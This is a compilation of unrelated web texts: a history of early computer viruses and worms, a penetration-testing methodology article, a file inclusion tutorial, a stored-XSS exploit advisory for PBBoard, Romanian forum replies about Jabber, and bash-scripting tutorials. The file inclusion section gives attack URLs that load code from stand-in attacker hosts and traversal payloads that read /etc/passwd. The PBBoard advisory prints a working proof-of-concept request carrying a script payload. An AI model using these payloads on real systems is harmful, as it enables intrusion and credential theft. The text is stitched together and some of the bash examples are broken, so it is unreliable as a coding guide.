Ghostballs - The Virus Encyclopedia Vienna- The Virus Encyclopedia: Vienna - The Virus Encyclopedia Virus.Multi.Ghostball.2351.a- Securelist: Securelist - Information about Viruses, Hackers and Spam - NotFound Michelangelo Madness: https://web.archive.org/web/20080309235614/http://www.research.ibm.com/antivirus/SciPapers/White/VB95/vb95.distrib-node7.html Michelangelo- f-prot.com: Michelangelo - F-Prot Antivirus Virus Information Source

These days, malware is an everyday concern, even among ordinary end users. A countless amount of money is lost every year worldwide due to malware, possibly in the hundreds of billions, but it’s difficult to accurately quantify. The money lost has causes ranging from lost hours of office productivity, to financial malware like what hit Target, to hardware that needs to be replaced due to infected firmware. What might amaze you is that malware has existed since at least 1971, and has been theorized as early as 1949. For the record, Microsoft didn’t exist until 1975. And it all started so innocently… “Self-Reproducing Automata” John Von Neumann was a revolutionary Hungarian-born mathemetician who immigrated to the United States in 1933. In 1948, Von Neumann started to talk about “cellular automata,” a complex mathemetical model for elementary biological functions. By 1949, those ideas evolved into his series of lectures on “self-reproducing automata,” given at the University of Illinois. Arthur W. Burks compiled those 1949 lectures into a paper that was first published in 1966. Von Neumann’s theories were astoundingly ahead of his time. His “cellular automata” ideas applied to microbes, such as biological viruses. From there, partly based on his experience with ENIAC, he imagined “self-reproducing automata” that could be an entity of those brand new “computing machines.” “I’m the Creeper. Catch me if you can!” Computers made by Digital Equipment Corporation played a crucial role in how computing evolved from the 1950s to the 1970s. MIT (the Massachusetts Institute of Technology) got their first PDP series computers in the 1950s. Timesharing programs had to be used so that MIT’s very first computer science students and professors could experiment with them. Some of the earliest breakthroughs in computer programming started there, back when it was done with punch cards. Elsewhere in Cambridge, Massachusetts, in 1971, Bob Thomas was a computer programmer. He worked on a timesharing program called TENEX, which ran on a PDP-10. Thomas wanted to see if a self-replicating program could be written. His machine was connected to ARPAnet, the very first packet-switched network, which was the father of the Internet. His program was called Creeper. In Thomas’ words, he was disappointed because it “didn’t install multiple instances of itself on several targets.” But Creeper spread through ARPAnet, nonetheless. Affected machines would print at the command line, “I’m the Creeper. Catch me if you can!” So, the string displayed on ARPAnet connected computers, even if it didn’t reproduce. Many computer scientists consider Creeper to be the very first computer virus. In fact, it wasn’t long until the very first antivirus program was created, specifically to remove Creeper… It was called Reaper. The First Worm In 1975, science fiction writer John Brunner theorized computer worms in The Shockwave Rider. In 1978, John Shock and Jon Hepps worked at the Xerox Palo Alto Research Center. I couldn’t verify whether or not they’ve read Brunner’s novel. It’s likely that they did, though, because they wrote what many consider to be the very first computer worm. They wrote five different versions, all designed to improve computer efficiency by exploring a network to find underused processors. But a bug in their programs caused computers to crash. Oops! Brain In 1986 in Pakistan, Basit Farooq Alvi and his brother Amjad Farooq Alvi were computer programmers. Some computer scientists consider their program, Brain, to be the very first computer virus, because Thomas’ Creeper didn’t self-replicate. Brain was an innocent experiment and nothing more. It spread via 5 1/4 inch floppies only, targetting the boot sector in PC-DOS and IBM-DOS based machines. Like Shock and Hepps’ worm, the Alvi brothers wrote different versions of Brain. Brain was relatively benign, because it basically just contained the code to self-replicate and copyrighted messages such as these: Welcome to the Dungeon (c) 198Welcome to the Dungeon (c) 1986 Basit & Amjad (pvt) Ltd. BRAIN COMPUTER SERVICES 730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE :430791,443248,280530. Beware of this VIRUS…. Contact us for vaccination………… $#@%$@!! Welcome to the Dungeon (c) 1986 Brain & Amjads (pvt) Ltd. VIRUS_SHOE RECORD v9.0 Dedicated to the dynamic memories of millions of virus who are no longer with us today - Thanks GOODNESS!! BEWARE OF THE er..VIRUS :This program is catching program follows after these messeges….. $#@%$@!! It seemed that the different versions of Brain really didn’t get people’s attention until 1988. Morris’ Worm Robert Morris was a doctoral student at Cornell University. On November 2nd, 1988, his worm was released. Like in Creeper versus Brain, some computer scientists consider Morris’ program to be the first worm, instead of Shock and Hepps’, a decade prior. But like in the other programs I’ve mentioned, the intent was experimental, not malicious. What was novel about Morris’ worm is that it did spread through the modern Internet, as it existed in the late 1980s. But like Shock and Hepps’ worm, a bug in Morris’ worm caused it to behave in a harmful way not intended by its creator. Five days later, on November 7th, Bob Page of the University of Lowell wrote: Page was likely the first computer scientist to properly describe the difference between a worm and a virus. Within 24 hours of the Internet debut of Morris’ worm, it infected approximately 5,000 computers. The United States General Accounting Officeestimated that between $100,000 and $10,000,000 worth of productivity was lost, due to computers being unable to access the Internet. The earliest viruses and worms were simply experiments with unintended consequences. But by the 1990s, personal computing exploded. Soon, nearly all offices and a large percentage of households had PCs. That coincided with the first true malware, programs with actual malicious intent. That was concurrent with personal computers and the Internet becoming a part of the everyday lives of ordinary people. I’ll explore that in my next article. Stay tuned! References Theory of Self-Replicating Automata John Von Neumann, complied by Arthur W. Burks University of Illinois Press Time Magazine – John Von Neumann John von Neumann - TIME Computer Viruses: From Theory to Applications Eric Filliol Springer First Computer Virus, Creeper, Was No Bug First Computer Virus, Creeper, Was No Bug : Discovery News A short history of hacks, worms, and cyberterror http://www.computerworld.com/s/article/9131924/A_short_history_of_hacks_worms_and_cyberterror The Internet Worm… Don’t Get Hooked! The Internet Worm...Don't Get Hooked! The history of worm like programs https://snowplow.org/tom/worm/history.html About Brain F-Secure - About Brain The History and Evolution of Computer Viruses: 1986-1991 The History and the Evolution of Computer Viruses: 1986-1991 | Privacy PC braininf.vir http://www.textfiles.com/virus/braininf.vir Going Viral: How Two Pakistani Brothers Created The First PC Virus Going Viral: How Two Pakistani Brothers Created the First PC Virus | Mental Floss A Report on the Internet Worm – Bob Page http://ftp.cerias.purdue.edu/pub/doc/morris_worm/worm.paper Source

Establishing a penetration testing methodology is becoming increasingly important when considering data security in web applications. The more we come to rely on networked communication and cloud-based data systems, the more we leave ourselves vulnerable to potentially damaging cyber attacks by outside parties. While designing and safeguarding secured systems has become standard, how can you be certain these systems work? The answer lies in building a comprehensive penetration testing methodology to protect your information assets. What is Penetration Testing? Think of a penetration testing methodology—or “pentesting” for short—as a controlled cyber attack during which your best defenses are put to the test and exploited to determine the extent of vulnerabilities in your web applications. Essentially, designing and implementing a penetration testing methodology allows you to: Hack your own system in a proactive, authorized environment, focusing on elements such as IT infrastructure, OS vulnerabilities, application issues and user and configuration errors; Analyze and validate both system defenses and user adherence to system protocols; and Assess potential attack vectors such as web applications, wireless networks and devices and servers. Unfortunately, no data is safe 100 percent of the time. But an effective penetration testing methodology can do wonders for eliminating unnecessary vulnerabilities. What Are the Benefits of a Penetration Testing Methodology? The stakes are high for data security. With an effective penetration testing methodology, you can: Identify vulnerabilities that scanning software cannot; Not only test those vulnerabilities, but also determine how prepared network defenders are to both detect and respond to attacks in a timely manner; Determine the potential magnitude of a successful attack; and Ensure all compliance protocols for data security are being met (a consideration especially important in the payments industry). Another benefit of taking your penetration testing methodology seriously is its potential affect on internal culture. When organizational leadership demonstrates a clear commitment to data security, it reinforces its importance to employees, who will then be encouraged to follow user-end protocols to the best of their abilities. How Often Should a Penetration Testing Methodology Be Performed? An effective penetration testing methodology is executed regularly. As the general wisdom goes, it’s better to be proactive and strengthen your web applications’ defenses now than to wait until you’ve already suffered an attack, losing valuable data in the process. In planning your penetration testing methodology, consider your industry. Not everyone is going to have the same security needs, but it’s your company’s responsibility to make sure confidential information stays confidential. Your organization should deploy its penetration testing methodology regularly, but especially when any of the following occurs: Regulations specific to your industry mandate it. For the payments industry, for example, this can be a quarterly requirement. In other sectors, pentests might only be an annual requirement. Any alterations to network infrastructure or web applications (internal or external). This could entail upgrades, modifications, security patches, new additions or total overhauls. Policies change. This is especially common on the end user side of the equation. Policy changes affect the nature of the user’s interaction with the web application, which could create new challenges. Your organization moves or adds a new location. This includes remote employees, who will be accessing web applications through their ISP rather than your organization’s secure network. Finally, when designing your penetration testing methodology, err on the side of caution. If you think you may need a pentest, you probably do. Pentesting may not be free, but the cost is preferable to a data breach. Building and Effective Penetration Testing Methodology In the previous decade, although support was building for establishing a more widely practiced penetration testing methodology, no standard materialized until 2010 with the introduction of the Penetration Testing Execution Standard (PTES). In the current version of the standard, PTES is divided into seven main sections: Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting These elements can be considered the fundamental elements of any penetration testing methodology. We will explore each of these points in the following sections. Pre-Engagement Interactions When building your penetration testing methodology, remember that pentesting requires a lot of trust. You will want to find a provider that is both experienced and familiar with the particular needs of your business. Remember, you’re essentially asking your provider to hack your system, so some ground rules should be established first: What is the Scope? Do you want a particular area of your business targeted, or your business in general? What (and who) is off limits? What Is the Schedule? You still have a business to run, so it’s important to establish during which hours the pentest is to be performed. The overall timeline of the pentest should be established as an essential element of your penetration testing methodology. Blackbox or Whitebox? In a whitebox test, the pentester is given baseline access or information to begin and is then charged with exploiting any weaknesses from that position. In a blackbox test, the pentester begins with nothing, just like an outside attacker. Who Are the Contacts? It’s important that communication channels be established between all involved parties, as lapses in communication could have a variety of unintended consequences. As the foundation of your penetration testing methodology, pre-engagement interactions should be considered very carefully. Intelligence Gathering In this phase of your penetration testing methodology, your provider begins the preliminary steps of planning their attack. In a properly planned pentest, the provider will have a clear idea of what is off limits and what is fair game. Understand that your provider is not doing their job if they’re not turning over every leaf looking for information about your business, its employees, its assets and its liabilities. As such, the time spent on this step of the penetration testing methodology can be quite extensive. Again, remember that establishing ground rules is important in your penetration testing methodology. Providers (and the actual hackers) are accustomed to discovering information however they can—even if that means searching through the company garbage. Threat Modeling Once relevant documentation has been gathered, the next step of the penetration testing methodology is to use that information to build a complete profile of your company and its assets. Once this is established, target primary and secondary assets will be determined and further scrutinized. Assets could entail a variety of different elements, including organizational data (e.g., policies, procedures, trade secrets), employee and customer data and “human assets”—high-level employees that could be exploited in a manner of ways. In a good penetration testing methodology, the provider won’t be biased in what assets they’re seeking out unless they are instructed to. Otherwise, they will work to identify those with the highest value. Vulnerability Analysis With the target assets established, the provider will then work to determine the best entry point to exploit those assets. A good penetration testing methodology will provide strict guidelines on project scope to ensure the client’s desired outcome is met. Sometimes this analysis can be a no-limits effort to uncover all potential vulnerabilities. In other cases, the provider will be asked to target a specific set of potential trouble spots. In a thorough penetration testing methodology, the extent of the vulnerability is then assessed, including the level of weakness and the sensitivity of the information it might expose. Exploitation & Post-Exploitation The next step in the penetration testing methodology is the attack itself. Just as in a real-world data breach, a properly executed exploitation can happen very quickly. Once the provider has gained access to your systems, they will not only continue working to avoid detection, but also attempt a strategy known as “privilege escalation” to gain greater access to the system, as well as additional potential assets. As the penetration testing methodology progresses to post-exploitation after the target has been achieved, the provider will assess the value of the compromised machine or entry point and determine whether it could be further exploited for later use. Reporting Clearly, a thorough penetration testing methodology involves a great deal of work in data collection, analysis and exploitation. But how will the provider report on this information so that your organization can turn it into actionable solutions? Here are some considerations: Get Specifics: High-level recommendations may provide a basic context for the problems with your web applications, but they aren’t always very helpful to the people charged with implementation. Walk-Throughs: Nothing beats learning through experience. Providers should be prepared to show relevant employees and specialists exactly what they did—and also how difficult it was to accomplish. Risk Level: Naturally, the more challenging an attack is to pull off, the harder it will be for others to do so. Providers should include a detailed report on the risk level of the vulnerabilities they encountered, as well as an assessment of the potential business impact if they are exploited. Finally, don’t be afraid to ask questions of your provider. A good penetration testing methodology, after all, is all about being as informed as possible. Source

A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files available on the web server or to execute malicious files on the web server by making use of the ‘include’ functionality. This vulnerability is mainly due to a bad input validation mechanism, wherein the user’s input is passed to the file include commands without proper validation. The impact of this vulnerability can lead to malicious code execution on the server or reveal data present in sensitive files, etc. ‘Include’ functionality Before we get into the details of this vulnerability, let us understand briefly the functioning of an “include” statement. In simple words, the include command takes all the content present in the specified file and copies it into the file that contains the include statement. File include methods are used to avoid re-coding and to obtain reusability. Developers may also use include statements to include the data common to most of the files in the application. The most common usage of the include statement is for footers, headers, menu files, etc. The below example explains the basic usage of the include functionality. Consider a menu page as follows: menu.php: <?php echo ‘<a href=”/home.asp”>HOME</a> <a href=”/details.asp”>DETAILS</a> <a href=”/contact.asp”>CONTACT US</a>; ?> The menu page can be included in all the pages throughout the application just by using the include statement as shown below: abc.html <html> <body> <div class =”menu”><?php include ‘menu.php’;?></div> <p>WELCOME</p> </body> </html> Now, the “menu.php” file gets included in the abc.html file, and whenever the “abc.html” file is accessed, the code present in the “menu.php” file is copied to the “abc.html” file and it is executed. As the functioning of the include statement is now clear, let us proceed to the file inclusion vulnerability. Going further, we shall deal with the file inclusion vulnerability in two different categories, based on whether the file is a remotely hosted file or a local file available on the web server: Remote file inclusion Local file inclusion Remote file inclusion RFI allows an attacker to include and execute a remotely hosted file using a script by including it in the attack page. The attacker can use RFI to run a malicious code either on the client side or on the server. The impact of this attack can vary from temporary theft of stealing session tokens or data when the target is client, to complete compromise of the system when the target is the application server. Remote file inclusion in PHP PHP is highly vulnerable to RFI attacks due to extensive usage of file include commands and due to default server configurations. To start with, first we need to find a location where a remote file is included in the application based on the user input. The user input is taken by the include function in PHP, and without proper validation of the input, the target site executes whatever input is provided in the vulnerable parameter. One of the vulnerable locations can be as follows, where the value of the “testfile” parameter is supplied by the user: www.victim_site.com/abc.php?testfile=example The vulnerable PHP code is as follows: $test = $_REQUEST["testfile"]; Include($test.”.php”); In the above code, the “testfile” parameter is taken from the request, and it is a user supplied value. The code takes in the “testfile” value and directly includes it in the PHP file. Following is one of the possible attack vectors for the above mentioned vulnerable PHP code: www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page The file “attack_page” is now included into the vulnerable include page available on the server and it gets executed whenever the “abc.php” page is accessed or executed. The attacker can carve malicious code in this “attack_page” and can perform malicious activities. Remote file inclusion in JSP Consider a scenario where a JSP page uses the “c:import” tag as follows to import a user supplied remote file in the current JSP page via an input parameter “test”. <c:import url=”<%= request.getParameter(“test”)%>”> The following vector can be one of the attack vectors for the above code: www.victim_site.com/abc.jsp?test=http://www.attackersite.com/stealingcookie.js The malicious script present in “stealingcookie.js”, which is available on a remote host and controlled by the attacker, is now imported into the victim site. Local file inclusion The local file inclusion vulnerability is a process of including the local files available on the server. This vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker may also make use of directory traversal characters and retrieve sensitive files available in other directories. Local file inclusion in PHP: Consider an example as follows where we can apply this attack. http://victim_site/abc.php?file=userinput.txt The value of “file” parameter is taken into the following PHP code, and the file is included: <?php … include $_REQUEST['file']; … ?> Now, an attacker can give malicious input in the “file” parameter which might retrieve unauthorized files present in the same directory, or he may use directory traversal characters like “../” to move to other directories. For example, an attacker can retrieve logs by supplying the input as “/apache/logs/error.log” or “/apache/logs/access.log”, or he can gather user credentials by supplying the input as “../../etc/passwd” in a UNIX like system. In special cases where a file extension is a default type which is added to the user input during file inclusion, the best way to avoid the default extension to be added is by using null byte terminator ” %00?. The script that enforces the file extension may be secure, but the user input given to it by adding a “%00? null byte at the end of the URL can be used to perform malicious activity by accessing any file type. Suppose that the input given is taken by the following code and the default extension being set is “.php”. <?php “include/”.include($_GET['testfile'].”.php”); ?> Now if an attacker wants to access a file which is not of type “txt”, the attacker can use a %00 (null byte character) after the filename. Therefore an attack vector for the above code can be as follows, which will retrieve the password file available on a UNIX like web server. http://victim_site/abc.php?testfile=../../../../etc/passwd%00 Local file inclusion in JSP: Assume that the following URL is requested in the application and the parameter “test” is taken as an input in the include statement:www.victim_site.com/abc.jsp?test=xyz.jspThe value of the test parameter is passed to the include statement present in the following code: … <jsp:include page=”<%= (String)request.getParameter(”test”)%>”> … An attack vector for the above code can be as follows where in a valid database file can be given as an input and due to the local file inclusion vulnerability present in the application, the database file is included in the JSP page:www.victim_site.com/abc.jsp?test=/WEB-INF/database/passwordDB RemediationAs the main cause for such vulnerabilities is improper input validation, the remediation suggestions for file inclusion mainly revolves around sanitizing the input received. Accept only characters and numbers for file names (A-Z 0-9). Blacklist all the special characters which are not of any use in a filename. Limit the API to allow inclusion of files only from one allowed directory so that directory traversal can also be avoided. From the above information we can conclude that the file inclusion attacks can be at times more harmful than SQL injection, etc — therefore there is a great need to remediate such vulnerabilities. And proper input validation is the only key to avoid such vulnerabilities. References: 1. https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion 2. https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion 3. Remote File Inclusion Tutorial | www.SecurityXploded.com Source

############################################################################## # Exploit Title : PBBoard CMS Stored xss vulnerability # Author : Manish Kishan Tanwar # Vendor : http://www.pbboard.info/ # version affected: all # Date : 7/12/2014 # Discovered @ : INDISHELL Lab # Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti # email : manish.1046@gmail.com ############################################################################## //////////////////////// /// Overview: //////////////////////// Program PBBoard is interactive Forum management program Dialogic Free classified software Free and open source. /////////////////////////////// // Vulnerability Description: /////////////////////////////// Stored xss vulnerability exist in "send private message" module, a user can send xss crafted private message to other user, and when reciever will open the message xss payload will execute ////////////////////////////// /// Proof of Concept: - ////////////////////////////// go to "inbox", click "compose message" type username, title and message body , intercept the request and change the content of "text" parameter with xss payload when reciever will open the message, xss payload will execute Proof image:- http://oi57.tinypic.com/112d5cx.jpg ////////////////////// ///Demo POC Request/// ////////////////////// POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------147872036312473 Content-Length: 670 -----------------------------147872036312473 Content-Disposition: form-data; name="to[]" ica -----------------------------147872036312473 Content-Disposition: form-data; name="title" hi -----------------------------147872036312473 Content-Disposition: form-data; name="text" hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">// -----------------------------147872036312473 Content-Disposition: form-data; name="icon" look/images/icons/i1.gif -----------------------------147872036312473 Content-Disposition: form-data; name="insert" Save -----------------------------147872036312473-- --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

din cate stiu eu nu are treaba contul si nici clientul... de multi ori problema e de la server ( se efectueaza lucrari de mentenanta) Ex: acum 2 saptamani timp de 48 de h conturile de jabber @jabber.ru nu au mers din cauza ca se efectua mentenanta...

in primul rand scrie corect in al doilea rand, pe ce ai cont de jabber ( server) @jabber.org sau ? posibil sa fie de la serverul jabber...

@florinul ai incercat cu al doilea cod si ai facut tot ce am zis?

to be honest I'm not good when it comes to servers so I can't tell, I posted for those who are interested.

Like many other modern high level programing languages or code interpreters, Linux shell has capability to use conditional statements. Often when writing a computer code, theres a need to perform different actions based on various logical decisions. For this purpose, it is possible to use conditional statements. Syntax of If/else statement: if condition_is_true then execute commands else execute commands fi Example below demonstrates simple if/else statement structure. If condition is satisfied, instructions after "then" syntax will be procesed, otherwise code or commands after "else" statement are executed: LinuxBox#vi my_script.sh #!/bin/bash # Condition check if/else statement number=5 if no=5; then echo "Number is 5 !" else echo "Number is not 5 !" fi :wq! LinuxBox# LinuxBox# ./my_script.sh Number is 5 ! We can use simple If/else statement for example in a script that checks if directory exists: LinuxBox# vi my_script.sh #!/bin/bash # simple if/else directory existence check directory="./myScripts" #check if directory exists if [ -d $directory ]; then echo "Directory exists !" else echo "Directory does not exists !" fi LinuxBox# ./my_script.sh Directory does not exists ! LinuxBox# mkdir myScripts LinuxBox# ./my_script.sh Directory exists ! While structure (loops) The while construction allows for repetitive execution of code or list of commands, as long as the command controlling the while loop executes successfully (exit status of zero). Syntax of While structure: while condition_is_true do execute these commands done This example shows while syntax. While loop keeps looping as long as counter is greater than 0: LinuxBox# vi my_script.sh #!/bin/bash # simple while looop script COUNT=5 while [ $COUNT -gt 0 ]; do echo Value of counter is: $COUNT let COUNT=COUNT-1 done LinuxBox# ./my_script.sh Value of counter is: 5 Value of counter is: 4 Value of counter is: 3 Value of counter is: 2 Value of counter is: 1 (Loop use Relational Operators in "[while condition]" to check for how long script has to loop. To see more about Relational Operators check this tutorial ) This example use while loop to get the right user input. Until user selects the right answer, script will keep (looping) repeating itself: LinuxBox# vi my_script.sh #!/bin/bash # while loop # Declare variable choice and assign value 0 choice=0 # Print to stdout echo "1. Shell" echo "2. Scripting" echo "3. ITTutorials" echo -n "Please enter a choice [1,2 or 3]? " # Loop while the variable choice is equal 0 while [ $choice -eq 0 ]; do # read user input read choice if [ $choice -eq 1 ]; then echo "Your choice is: Bash" else if [ $choice -eq 2 ] ; then echo "Your choice is: Scripting" else if [ $choice -eq 3 ] ; then echo "Your choice is: ITTutorials" else # user haven't entered the right choice so we'll ask the question again echo "Please make a choice between 1-3 !" echo "1. Bash" echo "2. Scripting" echo "3. ITTutorials" echo -n "Please choose a word [1,2 or 3]? " # and reset choice to 0 choice=0 fi fi fi done LinuxBox# ./my_script.sh 1. Shell 2. Scripting 3. ITTutorials Please enter a choice [1,2 or 3]? 3 Your choice is: ITTutorials LinuxBox# (Unless user enters integer value between 1-3, script will keep repeating itself.) Until loop Like the while loop, until loop is used for the same purpose of repetitive execution of code. Only difference is that condition that's controling loop is opposite. Loop will keep "looping" as long as the condition remains false, or in this case until it reaches value of defined counter: Syntax of Until loop: until [false] do execute commands done LinuxBox# vi my_script.sh #!/bin/bash # simple untill loop script, will keep looping until counter reaches value of 6 COUNT=0 # bash until loop until [ $COUNT -gt 5 ]; do echo Value of count is: $COUNT let COUNT=COUNT+1 done Select command The select command is often used for creating an interactive terminal menus. Syntax of Select statement: select varName in list do command1 command2 ...... ...... commandN done Example of script with interactive terminal menu using select statement: LinuxBox# vi my_script.sh #!/bin/bash # select statement PS3='Choose one word: ' # bash select select word in "linux" "shell" "scripting" "ittutorials" do echo "The word you have selected is: $word" # Break, otherwise we'll have endless loop break done exit 0 ( PS stands for prompt statement. It is shell's environment variable, and default prompt string used by select is "#?". It can be changed by re-defining PS3, so Select can display the string stored in PS3 when it is ready to read the user's selection like in the example.) Case statement Shell case statement is similar to switch statement in C and some other programing languages. It checks the Case condition, and controls the flow of the program. It can be used to test simple values like integers and characters. Syntax of Case statement: case expression in do pattern1) execute commands ;; pattern2) execute commands ;; .... patternN) execute commands ;; esac Example script with case statement: LinuxBox# vi my_script.sh #!/bin/bash # simple Case example script echo "What is your preferred programming / scripting language" echo "1) bash" echo "2) php" echo "3) C++" echo "4) C" echo "5) Exit" read user_choice; case $user_choice in 1) echo "You selected bash";; 2) echo "You selected php";; 3) echo "You selected C++";; 4) echo "You selected C";; 5) exit esac LinuxBox# ./my_script.sh What is your preferred programming / scripting language 1) bash 2) php 3) C++ 4) C 5) I do not know ! 1 You selected bash Shell Functions As in many other programming languages, usage of functions is also possible in shell scripting. Functions are used to group pieces of code in a more logical way, to enable calling that code anywhere inside the script and using it multiple times. Declaring a function is done by using "function" keyword with the name of that function. For example, function my_func { my_code }. Inside "{" and "}" goes code that will be executed every time the function is called. Calling a function is simple as writing function's name. Example of script that uses functions: LinuxBox# vi my_script.sh #!/bin/bash # script that uses functions function addition { A=3 B=5 result=`expr $A + $B` exho "$A + $B = $result" exit } function hello { echo "Just saying Hello from function." } hello addition LinuxBox# ./my_script.sh Just saying Hello from function. 3 + 5 = 8 Arithmetic Comparison Using relational operators we can easily compare numeric values. These operators would not work for string values unless their value is numeric. To see more about relational operators check Linux shell opertors tutorial. Comparing 2 numbers using relational operators: LinuxBox# vi my_script.sh #!/bin/bash # comparing 2 integer numbers echo "Enter 1st umber:" read 1st echo "Enter 2nd umber:" read 2nd if [ $1st -eq $2nd ]; then echo "Both numbers are equal" elif [ $1st -gt $2nd ]; then echo "1st is greater then 2nd number" else echo "2nd is greater then 1st number" fi LinuxBox# ./my_script.sh Enter 1st umber: 22 Enter 2nd umber: 5 1st is greater then 2nd number Source

Unix shell", "Bash" or "shell" is an interpreter or a command line interface run in a text window mode on a Linux or Unix like machines. It is used to interpret users commands, process them and forward to the lower levels of Operating System where they can be executed and perform desired action. Althought there are more shells like Korn shell, Perl shell, zsh, probably the most popular are Csh and Bash. Interpreter or shell also exist on Microsoft Windows and in the past was MS-DOS Prompt, now there are Command promt or Windows PowerShell. When the linux bash is invoked as an interactive shell, first it reads and executes commands from /etc/profile file. If /etc/profile doesn’t exist, commands from ~/.bash_profile, ~/.bash_login and ~/.profile are executed in the given order. Typically bash_profile executes ~/.bashrc. This file only runs during shell log in, and when a login shell exits, Bash reads and executes commands from the ~/.bash_logout file. Shell scripting Instead of running a single command, shell also has the ability of executing multiple or an entire set of complex sequences of commands from the external file known as a "shell script" or simply "script". A script might contain just a single command or large list of commands. It might contain functions, conditional constructs, loops and other logical structures common in programming. Therefore, a Bash shell script is a computer program written in the Bash programming language and Shell scripting is the art of creating and maintaining those scripts. Shell scripting may come from the desire to automate some routine procedure to make things easier for end users, or from a real need of automating many system administration tasks, such as performing disk backups or evaluating system logs. Writing a Simple Bash Script Shell script is basically a simple text file with sequences of commands and file permissions set for execution. Once interpreter "shell" calls a file, commands in the script are processed and executed. Every shell script starts with the "#!" sequence often called "shebang". Shebang represents a shell by which script will be executed. It is an absolute path where interpreter can be found. So for example if we would like to use Bourne shell as an interpreter, we can use sequence #!/bin/sh, or #!/bin/bash: LinuxBox#vi my_script.sh #!/bin/bash # This is my 1st script echo "Hi, this is hello from shell script !" :wq! (Other lines of code in script that start with sign "#" are comments. Comments are lines of code that are not processed by shell. Notice that in comments, "#" signs are not followed by the "!" exclamation mark sign - this is only reserved for "shebang" syntax. A good practice when writing a script is to make a simple name or explanation and put it in the comment line near the beginning of script.) After creating and saving my_script.sh in VI text editor, we have to change file's premissions to make it executable. To make a script executable we can set premissions something like 700 or similar: LinuxBox# chmod 700 my_script.sh LinuxBox# ls -l LinuxBox# -rwx------ 1 root root 29 Apr 29 13:07 my_script.sh After we have set executable permissions, script can be called and start doing it's job: LinuxBox#./my_script.sh Hi, this is hello from shell script ! LinuxBox# Once we know the basics, we can make some sripts and use commands that actualy do something usefull. For examaple if we want to make a simple backup script which syncs our data, we could write a script like this: LinuxBox# vi my_backup.sh #!/bin/bash # my simple backup script that uses rsync and tar tar -czf /home/ittutorials/Documents/my_pictures.tar.gz /home/ittutorials/Pictures rsync -avh --exclude="*.bak" /home/ittutorials/Documents/ /media/sdb/my_backup/ LinuxBox# ( The script could be called every day via CronJob. That way we could have automatic backup procedure. See CroonJob tutorial for more info on task scheduling and automation.) Use of Variables Simple batch jobs might be usefull for isolated tasks, but use of variables provides much more flexibility. Althought above script is useful, it has hard-coded paths. That might not be a problem, but when writing long scripts that reference paths often, better idea would be to utilize variables. That way we can put long path names into "memory boxes" (variables), and call them from variables whenever we want: LinuxBox# vi my_backup.sh #!/bin/bash # my simple backup script that uses variables and rsync SOURCEDIR=/home/ittutorials/Documents/MyPictures DESTDIR=/media/sdb/userdata/my_backup/ echo "Starting backup..." echo "Backuping" $SOURCEDIR rsync -avh --exclude="*.bak" $SOURCEDIR $DESTDIR echo "Backuping to destination" $DESTDIR echo "Backup is successful !" LinuxBox# ( This way, if we change variable for directory path in only one location, change will take effect for whole script where this variable is used, which makes maintenance of scripts a lot easier.) Global vs. Local variables Global variables can be used anywhere in this bash script. Once the global variable is defined and it's value is set, it can be used in functions, loops and any other logical structure inside the script in which it is defined. Local variables, are defined and used only inside the functions. It's life is limited to specific function in which it is defined, and it's value can't be used outside that function. This is often called the scope of variable. Local variables are define with the reserved word "local" used in front of variable name: LinuxBox# vi use_of_variables.sh #!/bin/bash # Local vs. Global variables VAR="Global variable" function my_function { #This variable is local to my_function function local VAR="Local variable" echo $VAR } echo $VAR my_function echo $VAR # Notice that global variable did not change # "local" is shell reserved word for local variables LinuxBox# ./use_of_variables.sh Global variable Local variable Global variable LinuxBox# (Notice that even though Global and Local variable have the same name "$VAR", value of global variable did not change once we defined and called Local variable from function.) Environment variables Environment variables are a set of dynamic named values that can affect the way running processes will behave. For example, an environment variable with a standard name can store the location that a particular computer system uses to store temporary files. Some Common and often used environment variables are: PATH - Sets the search path for any executable command. Similar to the PATH variable in MSDOS. HOME - Home directory of the user. MAIL - Contains the path to the location where mail addressed to the user is stored. PS1 - Primary prompts in bash. PS1 is set to $ by default. PS2 - Secondary prompts in bash. PS2 is set to '>' by default. USER - User login name. HOSTNAME - The system's host name. MACHTYPE - The CPU architecture that the system is running on. TERM - indicates the terminal type being used. This should be set correctly for editors like vi to work correctly. SHELL - Determines the type of shell that the user sees on logging in. To see what are the values of the above environment variables, just do an echo of the name of the variable preceeded with a $. For example, to determine the type of shell enter: LinuxBox# echo $SHELL /bin/bash LinuxBox# To see all environment variables and their values under UNIX-like operating systems, use set or printenv command: LinuxBox# set BASH=/bin/bash 